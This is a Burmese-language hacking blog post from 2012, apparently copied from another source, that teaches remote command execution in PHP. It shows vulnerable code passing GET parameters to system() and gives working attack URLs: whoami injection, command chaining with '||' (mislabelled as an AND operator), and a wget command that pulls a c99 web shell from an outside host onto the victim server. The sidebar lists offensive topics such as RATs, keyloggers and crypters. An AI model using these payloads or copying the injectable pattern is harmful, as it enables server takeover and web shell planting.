Tuesday, July 31, 2012

Remote Command Execution

Published : 9:00 PM Author :


Remote Command Execution ကိုလည္း Remote Code Execution လုိပဲ RCE လို႕ေခၚၾကပါတယ္ အေခၚအေ၀ၚဆင္သလို Attack လုပ္ပံုလည္း ဆင္တူပါတယ္ ။ Remote Command Execution ဆိုေတာ့အတိုင္း Remote Command ေတြ Execute လုပ္ခြင့္ေပးတာကို ဆိုလိုတာပါ ။

Code


<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

ဒီလိုသာျဖစ္ေနရင္ ကၽြန္ေတာ္တို႕ www.site.com/index.php?cmd=whoami ဆိုျပီး whoami command ေပးရင္ Server User Name တက္လာပါလိမ့္မယ္ ။ အဲ့ဒီလိုပဲ Command Execute လုပ္ႏုိင္တဲ့ အျခားေသာ PHP Function ေတြလည္းရွိပါေသးတယ္ ။

အဲ့ဒါေတြကေတာ့

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

တို႕ျဖစ္ပါတယ္ ။

Command ေပးတဲ့ေနရာမွာ whoami လို Command မေပးပဲ wget http://www.sh3ll.org/c99.txt? -O shell.php လို We Get Command ေပးလိုက္ရင္ Shell ကိုယူျပီး .php အျဖစ္ Out Put FIle ထုတ္သြားမွာျဖစ္ပါတယ္ ။

www.site.com/index.php?cmd=wget http://www.sh3ll.org/c99.txt? -O shell.php

အမွန္အတိုင္းေျပာရရင္ အေပၚက Example Vuln က Theory ဆန္လြန္းပါတယ္ ။ တကယ့္လက္ေတြ႕မွာျဖစ္သြားတာေလးေတြၾကည့္လိုက္ရေအာင္ ။

Example 1 :

Code from dig.php


<?php
include("common.php");
showMenu();
echo '<br>';
$status = $_GET['status'];
$ns  = $_GET['ns'];
$host   = $_GET['host'];
$query_type   = $_GET['query_type']; // ANY, MX, A , etc.
$ip      = $_SERVER['REMOTE_ADDR'];
$self   = $_SERVER['PHP_SELF'];
$host = trim($host);
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
echo '<pre>';
//start digging in the namserver
system ("dig @$ns $host $query_type");
echo '</pre>';
} else {
?>

ကၽြန္ေတာ္တုိ႕စိတ္၀င္စားတာ အပိုင္းေလးတစ္ပုိင္းပါပဲ ။ Remote Command Execute လုပ္ခြင့္ရွိမယ့္ အပိုင္းေလးတစ္ပိုင္းပါ ။

$ns  = $_GET['ns'];
system ("dig @$ns $host $query_type");

အဲ့ဒီ့မွာ ns variable ဟာ Filer လုပ္ထားျခင္းမရွိပါ ။ ဒါေၾကာင့္ Attacker က ၾကည့္တဲ့ Command Execute လုပ္ခြင့္ရွိပါတယ္ ။
www.site.com/dig.php?ns=whoami&host=ghostarea.net&query_type=NS&status=digging
whoami ဆိုတဲ့ Command ကို Execute လုပ္ဖို႕ၾကိဳးစားေပသိ Execute ျဖစ္သြားမွာမဟုတ္ပါဘူး အေၾကာင္းရင္းကေတာ့ Code က ဒီလိုသြားမွာျဖစ္မွာမို႕လို႕ပါ ။

system ("dig whoami ghostarea.net NS");

ဒီလို  Command မရွိတဲ့အတြက္ အလုပ္လုပ္မွာမဟုတ္ပါဘူး ။ ဒီေတာ့ ကၽြန္ေတာ္တို႕  တမ်ိဳးစဥ္းစား၇ပါလိမ့္မယ္။ Terminal မွာ အသံုးျပဳခြင့္ရွိတဲ့ And Operator || ကို သံုးပါ့မယ္ ။

www.site.com/dig.php?ns=||whoami||&host=ghostarea.net&query_type=NS&status=digging

ဒါဆုိရင္ code က ဒီလိုျဖစ္သြားပါ့မယ္

system ("dig ||whoami|| ghostarea.net NS");

ဒီလိုဆိုမွ dig နဲ႕ ghostarea.net NS ၾကားမွာျခားျပီး Command အျဖစ္ Execute လုပ္သြားမွာျဖစ္ပါတယ္ ။

posted by negative thunder
copy from mhf
Labels: , , |

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology